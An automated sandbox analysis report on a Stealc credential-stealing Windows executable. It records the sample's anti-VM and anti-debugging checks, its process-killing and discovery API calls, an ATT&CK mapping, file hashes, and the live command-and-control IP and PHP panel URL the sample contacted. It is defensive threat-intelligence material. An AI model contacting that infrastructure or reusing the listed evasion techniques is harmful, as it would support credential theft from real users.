Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarev
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	API call chain: ExitProcess graph end node	graph_0-31941
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	API call chain: ExitProcess graph end node	graph_0-31933
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	API call chain: ExitProcess graph end node	graph_0-31954

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00838011 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00838011

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00404A60 VirtualProtect 00000000,00000004,00000100,?

0_2_00404A60

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

0_2_004268F0

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_004265A0 mov eax, dword ptr fs:[00000030h]	0_2_004265A0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00766E8C push dword ptr fs:[00000030h]	0_2_00766E8C
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00836807 mov eax, dword ptr fs:[00000030h]	0_2_00836807
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00810D90 mov eax, dword ptr fs:[00000030h]	0_2_00810D90
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0081092B mov eax, dword ptr fs:[00000030h]	0_2_0081092B

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00404A60 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,

0_2_00404A60

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00838011 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00838011
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00837A2F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00837A2F
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00839BF0 SetUnhandledExceptionFilter,	0_2_00839BF0

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: X4roU7TtF1.exe PID: 2528, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_004248B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	0_2_004248B0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00834A87 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,	0_2_00834A87
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00834B17 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	0_2_00834B17

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00833197

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00424040 lstrcpy,lstrcpy,GetSystemTime,

0_2_00424040

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00422C10 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00422C10

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00833047 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00833047

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.X4roU7TtF1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.X4roU7TtF1.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.810e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.X4roU7TtF1.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2109975602.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X4roU7TtF1.exe PID: 2528, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.X4roU7TtF1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.X4roU7TtF1.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.810e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.X4roU7TtF1.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.X4roU7TtF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2109975602.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X4roU7TtF1.exe PID: 2528, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Create Account	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	11 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
X4roU7TtF1.exe	100%	Avira	HEUR/AGEN.1306956
X4roU7TtF1.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://92.255.57.88/7bbacc20a3bd2eb5.phpw#	0%	Avira URL Cloud	safe
http://92.255.57.88/7bbacc20a3bd2eb5.phpj	0%	Avira URL Cloud	safe
http://92.255.57.88/	0%	Avira URL Cloud	safe
http://92.255.57.88	0%	Avira URL Cloud	safe
http://92.255.57.88/7bbacc20a3bd2eb5.phpV	0%	Avira URL Cloud	safe
http://92.255.57.88/7bbacc20a3bd2eb5.php	0%	Avira URL Cloud	safe
http://92.255.57.883	0%	Avira URL Cloud	safe
http://92.255.57.88/X	0%	Avira URL Cloud	safe
http://92.255.57.88/7bbacc20a3bd2eb5.phpq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.88/	true	Avira URL Cloud: safe	unknown
http://92.255.57.88/7bbacc20a3bd2eb5.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://92.255.57.88	X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpw#	X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpj	X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
http://92.255.57.883	X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpV	X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpq	X4roU7TtF1.exe, 00000000.00000002.2192848328.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.88/X	X4roU7TtF1.exe, 00000000.00000002.2192848328.0000000000945000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.255.57.88	unknown	Russian Federation		42253	TELSPRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562757
Start date and time:	2024-11-26 00:11:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	X4roU7TtF1.exe renamed because original name is a hash value
Original Sample Name:	73adcb1012b382b6194c34b5cf277c9e.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 180
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: X4roU7TtF1.exe

Simulations

Behavior and APIs

Time	Type	Description
18:12:09	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELSPRU	Ldr-2.dll	Get hash	malicious	Unknown	Browse	92.255.57.46
	https://drugfreesport.info/lqb4s	Get hash	malicious	Phisher	Browse	92.255.57.46
	Setup.msi	Get hash	malicious	Unknown	Browse	92.255.57.46
	https://iop360.net/jsg2n	Get hash	malicious	Unknown	Browse	92.255.57.104
	tHvjY1G08Y.exe	Get hash	malicious	Cookie Stealer RedLine SmokeLoader Socelars Zealer Stealer onlyLogger	Browse	92.255.57.249
	68My8p1DpC.xls	Get hash	malicious	Hidden Macro 4.0	Browse	92.255.57.195
	68My8p1DpC.xls	Get hash	malicious	Hidden Macro 4.0	Browse	92.255.57.195
	malware.xls	Get hash	malicious	Hidden Macro 4.0	Browse	92.255.57.195
	malware.xls	Get hash	malicious	Hidden Macro 4.0	Browse	92.255.57.195
	stbuiv_9200401.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	92.255.57.195

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_X4roU7TtF1.exe_3536f0aed88ac12918802edacecdcde0e9dcd6_239356dd_6e9b2643-1a1b-4100-a01c-7dd8f3b46af7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9633026744880998
Encrypted:	false
SSDEEP:	192:OQc09KUXc9K0mtU6vaijsqZrP2izuiFDZ24IO8gD6:HfXymtU63jlFzuiFDY4IO87
MD5:	E605F292BCB8B88F2CC44B2C233C48CA
SHA1:	F3DCEC89D380ACA5A4A8C34058B2DD24DA0DE60E
SHA-256:	A4D01ACE0FEAE9832B2F207AA5423175F0477BFDC92524D77D0B30CB9ABF203A
SHA-512:	A539B8DBF82B122D8126E294579385638A32B438AE7EEADF2F7CFC52DEDC7F85D608B04AB3DF396AA838D67F68EDD1694873BE87E73907B7BD30B9BCB0D23358
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.4.9.9.2.4.0.0.7.2.1.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.4.9.9.2.4.4.1.3.4.2.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.9.b.2.6.4.3.-.1.a.1.b.-.4.1.0.0.-.a.0.1.c.-.7.d.d.8.f.3.b.4.6.a.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.a.c.4.d.6.5.-.1.5.c.5.-.4.6.f.0.-.8.d.b.a.-.a.b.2.e.3.2.e.3.3.3.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.4.r.o.U.7.T.t.F.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.e.0.-.0.0.0.1.-.0.0.1.5.-.5.c.2.3.-.9.8.6.e.8.f.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.7.c.0.5.7.a.c.5.3.4.6.d.9.a.4.b.8.4.4.9.0.a.9.9.6.1.6.b.8.0.7.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.f.2.a.9.5.a.5.e.3.7.a.2.a.f.9.a.1.2.3.6.7.d.2.c.2.a.1.9.3.8.e.3.c.a.7.c.5.5.!.X.4.r.o.U.7.T.t.F.1...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E3F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 25 23:12:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	64972
Entropy (8bit):	1.9735566981346675
Encrypted:	false
SSDEEP:	384:KU+bRJFmAgEtY0CHrD+SJvj03QZJL8hN9z:KHbRJFmAgEqHrD+65wb
MD5:	3074EFC6F1B69EF95ACADF334D67B4EC
SHA1:	61017D54E779A4F1C6A83ECD53F19AAE07D188C0
SHA-256:	E1874431DF85613365547CDF54C277734E8E2C5034FA038C1DBE8130C0A8D0B1
SHA-512:	BC40E18DC6FFE17F275836C0CE0C36993AB9516850913F8C2E11F7624369266636E6054AC9CFB84E12DD4F5D2B9535C973F0E149AAC7A3A307EE291373D1429D
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......D.Eg............4...............<............*..........T.......8...........T...........P3..\|.......................................................................................................eJ......H.......GenuineIntel............T...........@.Eg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F1A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.695329439030558
Encrypted:	false
SSDEEP:	192:R6l7wVeJcZD6ZHBHH6Y2DxSU9amngmfOxA+BapD089bPpsffFm:R6lXJk6ZHR6Y8SU9amngmf7+BmPCfw
MD5:	8DC3FA6B033EB9DB8DF418D80B7B916A
SHA1:	E1124FAF2B9CA4028BCEE49B5EDDD841B5BBC51F
SHA-256:	2FC4EC2FC90C1A88E0408FB99D0315AE021C7CDA1ECD2AD79608F464A7C134F0
SHA-512:	83EAAB35509BFF7328BBBDCEF36419E96AEDE57435509A5E9F9F222057CAD3C1D078C85B115C7543B3A14C877393077338765D5B692CEBDD255915A868B41ED9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F3B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.46345263414721
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI9E/WpW8VYPL40Ym8M4Jix/L6FPtl+q8hf+eEfi9wmAd:uIjf9I7qu7VmLKJJl5iKmAd
MD5:	0FFAE845A48AF81891072A38019F3222
SHA1:	5099CB8EABC0BF0556C5911126AE90C556229D5A
SHA-256:	D2436762A426D29E9A70A98F1F246CAE2F7412DC791A0D683F7A1C82B2065EF5
SHA-512:	435BBD85432A95A0ED608FD34E85EFADA84AA53CA097CFCE670EF414041AA772724A9C738F6D4CF57CB518EF4B5945646AA1CB7F10297BC126952EA67D76705B
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604214" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468587156939475
Encrypted:	false
SSDEEP:	6144:5zZfpi6ceLPx9skLmb0fJZWSP3aJG8nAgeiJRMMhA2zX4WABluuNejDH5S:RZHtJZWOKnMM6bFp0j4
MD5:	A4034AE260209F0C57903402F0339FD4
SHA1:	9535C0EBB13A152A345983188A88AF9FE12A11B9
SHA-256:	DA72BE90DB15772CDCC6963A590ABDD84AFA0FC28FEEF70D32D3389FFC656675
SHA-512:	E82F7CC508A8A8DC9460E167105D802491796A91EC46DC6B2F0BC7E2E6B874331ADC5C21B9C959DFC5E8E891B89CDF9F54F053BBE79AE639B54029442FA45E59
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...p.?................................................................................................................................................................................................................................................................................................................................................D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.890713236346515
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	X4roU7TtF1.exe
File size:	414'208 bytes
MD5:	73adcb1012b382b6194c34b5cf277c9e
SHA1:	d4f2a95a5e37a2af9a12367d2c2a1938e3ca7c55
SHA256:	4a1c3bd9ad6059315a24b7bbb2cd9d6164375555e41a7bfe2ca2353b54f4a32f
SHA512:	31706367e44444b5713e59a306f75a43f3b8b8d48114d7d12b172496291200c25ca75bccaa820d5e988fd28dbb1c09c8e52817b0a01acfa88217ce0431110552
SSDEEP:	3072:/XESEL1VgtAugYqW+VXi2UHrPan1IiJ9ETfFXSv4wR5gWY9UdaMRH4Lb9mQeIAzk:vGL1GtAoDrnrPS13ITfFux4Vmvq3UT
TLSH:	EC94F101B682D476D7A644349438C6F02A7B38776BB0845B37A43FAF2D703E19BB6356
